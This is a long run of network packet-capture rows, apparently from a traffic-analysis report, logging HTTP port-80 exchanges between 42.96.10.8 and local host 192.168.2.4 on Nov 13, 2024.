                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709801912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709811926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709820032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709834099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709836960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709852934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709868908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709884882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709887028 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709904909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.709906101 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.710278988 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.711992979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712008953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712023973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712038040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712049961 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712054014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712069988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712079048 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712088108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712104082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712104082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712137938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712160110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712162971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712177038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712193012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712204933 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712208986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712224007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712229013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712239981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712265968 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712270975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712297916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712300062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712313890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712330103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712343931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712358952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712371111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712376118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712387085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712392092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712407112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712415934 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712439060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712450981 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712464094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712480068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712503910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712506056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712522030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712537050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712543011 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712553024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712564945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712579966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712588072 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712596893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712603092 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712611914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712626934 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712640047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712654114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712667942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712682962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712693930 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712697983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712711096 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712714911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712730885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712747097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712748051 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712763071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712778091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712790012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712798119 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712805986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712811947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712822914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712836027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712838888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712853909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712863922 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712872982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712888956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712888956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712905884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712922096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712923050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712949038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712965012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712980986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712991953 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.712997913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713012934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713013887 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713030100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713042021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713043928 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713066101 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713227034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713268995 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713308096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713323116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713339090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713354111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713367939 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713370085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713401079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713414907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713429928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713455915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713470936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713470936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713486910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713489056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713502884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713517904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713521004 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713532925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713550091 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713560104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713573933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713589907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713603973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713607073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713620901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713633060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713635921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713653088 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713653088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713669062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713690042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713696003 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713715076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713730097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713732958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713754892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713772058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713772058 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713789940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713807106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713829041 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713846922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713857889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713864088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713877916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713891983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713902950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713908911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713923931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713938951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713949919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713956118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713972092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713973045 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713990927 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.713994980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714010954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714026928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714032888 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714042902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714056969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714060068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714076042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714102030 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714308023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714353085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714392900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714409113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714425087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714438915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714447975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714454889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714472055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714473009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714512110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714544058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714560986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714576006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714590073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714603901 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714607000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714623928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714633942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714639902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714656115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714663982 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714684010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714701891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714718103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714728117 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714747906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714859009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714874983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714890957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714916945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714916945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714932919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714943886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714948893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714973927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714987040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.714987993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715004921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715019941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715022087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715034962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715040922 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715055943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715069056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715080023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715095997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715111971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715126038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715138912 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715142965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715158939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715162992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715173960 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715174913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715190887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715204954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715218067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715218067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715234041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715250969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715251923 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715265036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715269089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715280056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715305090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715322971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715328932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715343952 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715346098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715361118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715377092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715393066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715403080 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715416908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715418100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715435028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715451956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715466022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715470076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715482950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715497017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715498924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715517044 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715517044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715543985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715557098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715568066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715581894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715600014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715609074 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715625048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715636015 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715641975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715656996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715672970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715687990 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715698004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715713024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715715885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715730906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715745926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715753078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715763092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715789080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715797901 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715805054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715821028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715822935 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715838909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715852976 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715854883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715873957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715888977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715897083 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715904951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715950012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.715987921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.716017008 CET804973342.96.10.8192.168.2.4
